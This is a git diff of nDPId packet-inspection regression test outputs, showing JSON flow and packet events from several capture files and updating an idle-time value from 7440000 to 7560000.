+01244{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1429000378528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":632,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":632,"pkt_l4_len":596,"thread_ts_msec":1429000378528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAmhMQkAArAYwvXgcIygKNqn6AFDLNvB8o6L58VK0UBgIIuBYAAD6gvJK3aB9Wdi2WzDeNoMColML2KCtNfUY2CwzdFLplFssslM2yXsBjnaIJOEoejcQpeFF355YUwtgWhdMMI2rg7t6Y06MNF1+oUMraF1z7dOGYZiWEw55N0R\/C4GUApqp4yWGJ\/CM91mr7EMXR6GJMnCnweJmOE9\/g4efV5ECHsiWKrismHwHX5cBOn2yA4HpOUGRsqAyJSxdx43skOx+vp23ro8\/JrEVnLzlB\/lGV2fdWo3w6VLreno\/QTmqd4pUmkkPPriJdaoBuDGz2cVi7p0befEK6oJ\/9C0fIAdMUQBOBN698TN\/3U5eWrczQSMLB8LJ0s1VPNsG+Uk7iZbLm2h44wxC+hzTD6Om+31wmxRZkWLFty4nGoqINn64kMxZ8jk+gAnxToClxMmrRX+tVkrmxooeDNg8O2BoKHSVu0QB4ZTXmBGAzxtP6AAAUY4sOQns2cIzqTR+SY+i5krcNUfqmctlUK2HS0mekAkRZ9Fb5CIveTsXhz6bTGoR+ZwaRiShSLUWZmInPoFtYMo3SK7u+PM7bDKFUbsQjbVXKacOgHhzN29\/N7\/9u6t2jU0DoTZfnm8RO0mzmGxReSHeGiwBid9gvCA11\/mk5FbSERauRsVxeiUkx2WKBttn3weSeMdFTFGBLzM8bDgXW729KN0+91NW+r+XNzcfLAhYR8kvwcN\/mM+lqT\/pSe\/P8rPDJ\/eOsiJDbHhm2\/4+8udWjPDnsNjkEwnYrvxC7JJAG7cy2LCX7EmJxNJ1SyoFMAc="} +01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1429000378725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000378725,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYCSkAAPwboUwo2qfp4HCMoyzYAUPnxUrTwfKXiUBhgH8mSAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030398,"flow_last_seen":1429000039635,"flow_idle_time":7560000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":1324,"flow_tot_l4_payload_len":3136,"flow_avg_l4_payload_len":784,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030766,"flow_last_seen":1429000040059,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3456,"flow_avg_l4_payload_len":864,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000041481,"flow_last_seen":1429000041819,"flow_idle_time":7560000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000050062,"flow_last_seen":1429000052145,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000052348,"flow_last_seen":1429000052688,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":529,"flow_avg_l4_payload_len":264,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000054595,"flow_last_seen":1429000054967,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1429000031075,"flow_last_seen":1429000031382,"flow_idle_time":7560000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037600,"flow_last_seen":1429000037659,"flow_idle_time":7560000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000117728,"flow_last_seen":1429000118045,"flow_idle_time":7560000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":775,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":678,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000049060,"flow_last_seen":1429000051518,"flow_idle_time":7560000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":1096,"flow_tot_l4_payload_len":2511,"flow_avg_l4_payload_len":627,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1429000052217,"flow_last_seen":1429000153720,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":42262,"flow_avg_l4_payload_len":650,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1429000153937,"flow_last_seen":1429000207676,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5584,"flow_avg_l4_payload_len":698,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000207973,"flow_last_seen":1429000236577,"flow_idle_time":7560000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":4656,"flow_avg_l4_payload_len":665,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1429000237766,"flow_last_seen":1429000347404,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":18206,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000347103,"flow_last_seen":1429000374116,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1192,"flow_tot_l4_payload_len":2530,"flow_avg_l4_payload_len":632,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000375190,"flow_last_seen":1429000385363,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3892,"flow_avg_l4_payload_len":556,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000031698,"flow_last_seen":1429000032158,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037314,"flow_last_seen":1429000037771,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000110390,"flow_last_seen":1429000110528,"flow_idle_time":7560000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000048159,"flow_last_seen":1429000048795,"flow_idle_time":7560000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":1169,"flow_tot_l4_payload_len":2143,"flow_avg_l4_payload_len":714,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","packets-captured":155,"packets-processed":155,"total-skipped-flows":0,"total-l4-data-len":95867,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":121,"global_ts_msec":1429000385363} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 155/155 diff --git a/test/results/rdp.pcap.out b/test/results/rdp.pcap.out index 99678b2f1..a2cfe1af9 100644 --- a/test/results/rdp.pcap.out +++ b/test/results/rdp.pcap.out @@ -1,11 +1,11 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rdp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1559207465138} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559207465138,"flow_last_seen":1559207465138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1559207465138,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1559207465138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1559207465138,"pkt":"AgAAAEUAAEAAAEAAQAbIuKwQArnAqAKOzQ4NPfm84lgAAAAAsML\/\/7iqAAACBAT5AQMDBQEBCAoLUEqcAAAAAAQCAAA="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1559207465180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1559207465180,"pkt":"AgAAAEUAADRflEAAfwYqMMCoAo6sEAK5DT3NDkeav7z5vOJZgBL6AEVOAAACBAW0AQMDAAEBBAI="} -00431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1559207465181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1559207465181,"pkt":"AgAAAEUAACgAAEAAQAbI0KwQArnAqAKOzQ4NPfm84llHmr+9UBAgAGAaAAA="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1559207465138,"flow_last_seen":1559207465181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1559207465181,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} -00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2010,"flow_first_seen":1559207465138,"flow_last_seen":1559207472692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1273,"flow_tot_l4_payload_len":534243,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1559207472692,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559207465138,"flow_last_seen":1559207465138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1559207465138,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1559207465138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1559207465138,"pkt":"AgAAAEUAAEAAAEAAQAbIuKwQArnAqAKOzQ4NPfm84lgAAAAAsML\/\/7iqAAACBAT5AQMDBQEBCAoLUEqcAAAAAAQCAAA="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1559207465180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1559207465180,"pkt":"AgAAAEUAADRflEAAfwYqMMCoAo6sEAK5DT3NDkeav7z5vOJZgBL6AEVOAAACBAW0AQMDAAEBBAI="} +00431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1559207465181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1559207465181,"pkt":"AgAAAEUAACgAAEAAQAbI0KwQArnAqAKOzQ4NPfm84llHmr+9UBAgAGAaAAA="} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1559207465138,"flow_last_seen":1559207465181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1559207465181,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} +00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2010,"flow_first_seen":1559207465138,"flow_last_seen":1559207472692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1273,"flow_tot_l4_payload_len":534243,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1559207472692,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","packets-captured":2010,"packets-processed":2010,"total-skipped-flows":0,"total-l4-data-len":534243,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1559207472692} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2010/2010 diff --git a/test/results/reasm_crash_anon.pcapng.out b/test/results/reasm_crash_anon.pcapng.out index 7b56ac794..88076737b 100644 --- a/test/results/reasm_crash_anon.pcapng.out +++ b/test/results/reasm_crash_anon.pcapng.out @@ -1,14 +1,14 @@ 00469{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1410865705717} -00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1410865705717,"flow_last_seen":1410865705717,"flow_idle_time":7440000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1410865705717,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 